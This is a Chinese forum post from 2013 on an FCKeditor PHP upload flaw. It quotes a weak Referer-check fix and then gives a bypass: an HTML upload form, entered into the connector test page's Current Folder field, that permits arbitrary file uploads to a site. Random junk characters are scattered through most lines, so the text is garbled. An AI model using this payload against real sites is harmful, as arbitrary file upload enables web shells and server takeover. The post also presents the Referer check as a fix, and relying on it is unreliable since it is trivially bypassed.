漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php& \' v& j m! L; y k
网上给出的修复方案是" f7 T) |- S/ ^* B$ K
修复方法,删除FCK编辑器用其他的编辑器
: W6 ]% u( V1 U或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件* C3 _8 R' {6 y9 o
在! |5 ]3 W( I4 s+ x4 `* D7 V" b
require(‘config.php’);
; R2 x k# R7 grequire(‘util.php’);
, |. j$ Z" }5 d# k) {& h的下面添加以下代码—————————–; A9 @: O M, F7 S0 w+ q. y
//防止外部提交5 O; v" r4 a! u" O, j7 m/ E4 A6 O
function outsidepost()
3 |4 p. C' }9 \6 |$ }{
9 K0 _6 ~' I. J5 n$servername=$_SERVER['SERVER_NAME'];- J' P! y& ]% L% d
$sub_from=@$_SERVER['HTTP_REFERER'];. \" R+ X3 u, J5 \
$sub_len=strlen($servername);
/ Z( y& K+ n+ i: a$checkfrom=substr($sub_from,7,$sub_len);" l; K2 Y/ B5 D @0 t/ _6 Z
if($checkfrom!=$servername){
' d' w" {2 i7 J, @' r% mecho(“you don’t outsidepost!”);+ K6 [8 T9 ^* E& Q8 }$ U
exit;& L3 w6 U+ b$ J4 ?7 R) M. A6 @; c
}4 X$ w, K6 d! o7 L% w4 [+ o
}
3 J) a8 C; E6 Noutsidepost();5 c8 X' W5 {( c
防止外部提交,但是没有防止内部提交,
$ \( _0 d* \- D6 S2 V. _" Z j利用方法:
* K, Y- `% }0 h& M* x7 C- Y' N1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
9 ?/ c" D+ K+ Q8 `& d2,在Current Folder 框输入' K& s7 g/ j. L2 V+ o
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>3 H, X! N7 M% Z- ?. B: l7 e: \4 a
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。2 n7 Y- ~. r! [
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对